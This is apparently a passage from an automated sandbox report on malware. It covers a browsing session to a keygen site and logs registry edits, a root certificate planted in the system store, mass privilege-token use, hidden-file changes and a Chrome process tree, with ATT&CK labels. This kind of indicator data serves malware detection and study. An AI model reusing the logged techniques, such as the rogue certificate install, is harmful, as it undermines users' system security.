Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry\DontShowMeThisDialogAgain	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PageSetup	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Toolbar	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionHigh = "0"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\MigrationTime = 998267c856add601	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\PrivacyAdvanced = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionHigh = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CacheLimit = "256000"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url5 = "https://twitter.com/"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming\ChangeUnitGenerationNeeded = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode\FontSize = "3"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\DynamicCodePolicy = 00000000	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Privacy\ClearBrowsingHistoryOnStart = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\New Windows	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery	MicrosoftEdge.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	keygen-step-2.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	keygen-step-2.exe

Runs ping.exe 1 TTPs 5 IoCs

Remote System Discovery

T1018

pid	Process
6348	PING.EXE
4692	PING.EXE
4176	PING.EXE
5156	PING.EXE
6260	PING.EXE

Script User-Agent 13 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	227	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	233	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	453	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	796	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	817	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	888	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	228	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	457	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	719	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	727	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	884	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	885	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	890	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 46 IoCs

pid	Process
2484	chrome.exe
2484	chrome.exe
896	chrome.exe
896	chrome.exe
4504	chrome.exe
4504	chrome.exe
3920	chrome.exe
3920	chrome.exe
4388	chrome.exe
4388	chrome.exe
4288	chrome.exe
4288	chrome.exe
4308	chrome.exe
4308	chrome.exe
4136	setups.tmp
4136	setups.tmp
3904	multitimer.exe
3904	multitimer.exe
3904	multitimer.exe
3904	multitimer.exe
3904	multitimer.exe
3904	multitimer.exe
3904	multitimer.exe
3904	multitimer.exe
3904	multitimer.exe
3904	multitimer.exe
3904	multitimer.exe
3904	multitimer.exe
3904	multitimer.exe
3904	multitimer.exe
3904	multitimer.exe
3904	multitimer.exe
3904	multitimer.exe
3904	multitimer.exe
3820	chrome.exe
3820	chrome.exe
204	chrome.exe
204	chrome.exe
5160	vpn.tmp
5160	vpn.tmp
5160	vpn.tmp
5160	vpn.tmp
5228	IBInstaller_97039.tmp
5228	IBInstaller_97039.tmp
5460	chrome.exe
5460	chrome.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
852	msinfo32.exe

Suspicious behavior: MapViewOfSection 2 IoCs

pid	Process
4188	MicrosoftEdgeCP.exe
4188	MicrosoftEdgeCP.exe

Suspicious use of AdjustPrivilegeToken 49 IoCs

description	pid	Process
Token: SeDebugPrivilege	1484	Setup.exe
Token: SeCreateTokenPrivilege	4100	askinstall20.exe
Token: SeAssignPrimaryTokenPrivilege	4100	askinstall20.exe
Token: SeLockMemoryPrivilege	4100	askinstall20.exe
Token: SeIncreaseQuotaPrivilege	4100	askinstall20.exe
Token: SeMachineAccountPrivilege	4100	askinstall20.exe
Token: SeTcbPrivilege	4100	askinstall20.exe
Token: SeSecurityPrivilege	4100	askinstall20.exe
Token: SeTakeOwnershipPrivilege	4100	askinstall20.exe
Token: SeLoadDriverPrivilege	4100	askinstall20.exe
Token: SeSystemProfilePrivilege	4100	askinstall20.exe
Token: SeSystemtimePrivilege	4100	askinstall20.exe
Token: SeProfSingleProcessPrivilege	4100	askinstall20.exe
Token: SeIncBasePriorityPrivilege	4100	askinstall20.exe
Token: SeCreatePagefilePrivilege	4100	askinstall20.exe
Token: SeCreatePermanentPrivilege	4100	askinstall20.exe
Token: SeBackupPrivilege	4100	askinstall20.exe
Token: SeRestorePrivilege	4100	askinstall20.exe
Token: SeShutdownPrivilege	4100	askinstall20.exe
Token: SeDebugPrivilege	4100	askinstall20.exe
Token: SeAuditPrivilege	4100	askinstall20.exe
Token: SeSystemEnvironmentPrivilege	4100	askinstall20.exe
Token: SeChangeNotifyPrivilege	4100	askinstall20.exe
Token: SeRemoteShutdownPrivilege	4100	askinstall20.exe
Token: SeUndockPrivilege	4100	askinstall20.exe
Token: SeSyncAgentPrivilege	4100	askinstall20.exe
Token: SeEnableDelegationPrivilege	4100	askinstall20.exe
Token: SeManageVolumePrivilege	4100	askinstall20.exe
Token: SeImpersonatePrivilege	4100	askinstall20.exe
Token: SeCreateGlobalPrivilege	4100	askinstall20.exe
Token: 31	4100	askinstall20.exe
Token: 32	4100	askinstall20.exe
Token: 33	4100	askinstall20.exe
Token: 34	4100	askinstall20.exe
Token: 35	4100	askinstall20.exe
Token: SeDebugPrivilege	4444	taskkill.exe
Token: SeDebugPrivilege	3904	multitimer.exe
Token: SeDebugPrivilege	4848	MicrosoftEdge.exe
Token: SeDebugPrivilege	4848	MicrosoftEdge.exe
Token: SeDebugPrivilege	4848	MicrosoftEdge.exe
Token: SeDebugPrivilege	4848	MicrosoftEdge.exe
Token: SeDebugPrivilege	4368	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	4368	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	4368	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	4368	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	4848	MicrosoftEdge.exe
Token: SeDebugPrivilege	4420	multitimer.exe
Token: SeDebugPrivilege	5160	vpn.tmp
Token: SeDebugPrivilege	5160	vpn.tmp

Suspicious use of FindShellTrayWindow 18 IoCs

pid	Process
896	chrome.exe
896	chrome.exe
896	chrome.exe
896	chrome.exe
896	chrome.exe
896	chrome.exe
896	chrome.exe
896	chrome.exe
896	chrome.exe
896	chrome.exe
896	chrome.exe
896	chrome.exe
204	chrome.exe
5104	Setup3310.tmp
5160	vpn.tmp
5264	c0kjmtsswjd.exe
5228	IBInstaller_97039.tmp
204	chrome.exe

Suspicious use of SetWindowsHookEx 6 IoCs

pid	Process
4996	OpenWith.exe
4996	OpenWith.exe
4996	OpenWith.exe
4848	MicrosoftEdge.exe
4188	MicrosoftEdgeCP.exe
4188	MicrosoftEdgeCP.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 896 wrote to memory of 2188	896	chrome.exe	72
PID 896 wrote to memory of 2188	896	chrome.exe	72
PID 896 wrote to memory of 3112	896	chrome.exe	75
PID 896 wrote to memory of 3112	896	chrome.exe	75
PID 896 wrote to memory of 3112	896	chrome.exe	75
PID 896 wrote to memory of 3112	896	chrome.exe	75
PID 896 wrote to memory of 3112	896	chrome.exe	75
PID 896 wrote to memory of 3112	896	chrome.exe	75
PID 896 wrote to memory of 3112	896	chrome.exe	75
PID 896 wrote to memory of 3112	896	chrome.exe	75
PID 896 wrote to memory of 3112	896	chrome.exe	75
PID 896 wrote to memory of 3112	896	chrome.exe	75
PID 896 wrote to memory of 3112	896	chrome.exe	75
PID 896 wrote to memory of 3112	896	chrome.exe	75
PID 896 wrote to memory of 3112	896	chrome.exe	75
PID 896 wrote to memory of 3112	896	chrome.exe	75
PID 896 wrote to memory of 3112	896	chrome.exe	75
PID 896 wrote to memory of 3112	896	chrome.exe	75
PID 896 wrote to memory of 3112	896	chrome.exe	75
PID 896 wrote to memory of 3112	896	chrome.exe	75
PID 896 wrote to memory of 3112	896	chrome.exe	75
PID 896 wrote to memory of 3112	896	chrome.exe	75
PID 896 wrote to memory of 3112	896	chrome.exe	75
PID 896 wrote to memory of 3112	896	chrome.exe	75
PID 896 wrote to memory of 3112	896	chrome.exe	75
PID 896 wrote to memory of 3112	896	chrome.exe	75
PID 896 wrote to memory of 3112	896	chrome.exe	75
PID 896 wrote to memory of 3112	896	chrome.exe	75
PID 896 wrote to memory of 3112	896	chrome.exe	75
PID 896 wrote to memory of 3112	896	chrome.exe	75
PID 896 wrote to memory of 3112	896	chrome.exe	75
PID 896 wrote to memory of 3112	896	chrome.exe	75
PID 896 wrote to memory of 3112	896	chrome.exe	75
PID 896 wrote to memory of 3112	896	chrome.exe	75
PID 896 wrote to memory of 3112	896	chrome.exe	75
PID 896 wrote to memory of 3112	896	chrome.exe	75
PID 896 wrote to memory of 3112	896	chrome.exe	75
PID 896 wrote to memory of 3112	896	chrome.exe	75
PID 896 wrote to memory of 3112	896	chrome.exe	75
PID 896 wrote to memory of 3112	896	chrome.exe	75
PID 896 wrote to memory of 3112	896	chrome.exe	75
PID 896 wrote to memory of 3112	896	chrome.exe	75
PID 896 wrote to memory of 2484	896	chrome.exe	76
PID 896 wrote to memory of 2484	896	chrome.exe	76
PID 896 wrote to memory of 212	896	chrome.exe	77
PID 896 wrote to memory of 212	896	chrome.exe	77
PID 896 wrote to memory of 212	896	chrome.exe	77
PID 896 wrote to memory of 212	896	chrome.exe	77
PID 896 wrote to memory of 212	896	chrome.exe	77
PID 896 wrote to memory of 212	896	chrome.exe	77
PID 896 wrote to memory of 212	896	chrome.exe	77
PID 896 wrote to memory of 212	896	chrome.exe	77
PID 896 wrote to memory of 212	896	chrome.exe	77
PID 896 wrote to memory of 212	896	chrome.exe	77
PID 896 wrote to memory of 212	896	chrome.exe	77
PID 896 wrote to memory of 212	896	chrome.exe	77
PID 896 wrote to memory of 212	896	chrome.exe	77
PID 896 wrote to memory of 212	896	chrome.exe	77
PID 896 wrote to memory of 212	896	chrome.exe	77
PID 896 wrote to memory of 212	896	chrome.exe	77
PID 896 wrote to memory of 212	896	chrome.exe	77
PID 896 wrote to memory of 212	896	chrome.exe	77
PID 896 wrote to memory of 212	896	chrome.exe	77
PID 896 wrote to memory of 212	896	chrome.exe	77

Views/modifies file attributes 1 TTPs 4 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
6656	attrib.exe
8752	attrib.exe
7976	attrib.exe
9960	attrib.exe

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" https://keygenninja.com/
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:896
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xc8,0xcc,0xd0,0xa4,0xd4,0x7ffa45116e00,0x7ffa45116e10,0x7ffa45116e20
  2⤵
  PID:2188
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1596 /prefetch:2
  2⤵
  PID:3112
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1664 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2484
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2108 /prefetch:8
  2⤵
  PID:212
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2820 /prefetch:1
  2⤵
  PID:3512
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2840 /prefetch:1
  2⤵
  PID:1520
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3400 /prefetch:1
  2⤵
  PID:2092
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3516 /prefetch:1
  2⤵
  PID:3820
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3528 /prefetch:1
  2⤵
  PID:3764
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3536 /prefetch:1
  2⤵
  PID:3760
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4440 /prefetch:8
  2⤵
  PID:4332
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5484 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4504
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5540 /prefetch:8
  2⤵
  PID:4520
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5568 /prefetch:8
  2⤵
  PID:4644
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5376 /prefetch:8
  2⤵
  PID:4668
- C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe
  "C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --force-configure-user-settings
  2⤵
  PID:4684
- - C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe
    "C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0x24c,0x250,0x254,0x228,0x258,0x7ff7dcd77740,0x7ff7dcd77750,0x7ff7dcd77760
    3⤵
    PID:4776
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5836 /prefetch:8
  2⤵
  PID:4736
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5380 /prefetch:8
  2⤵
  PID:4792
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4752 /prefetch:8
  2⤵
  PID:4928
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5644 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3920
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5832 /prefetch:8
  2⤵
  PID:5112
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4244 /prefetch:8
  2⤵
  PID:5044
- C:\Program Files\Google\Chrome\Application\chrome.exe
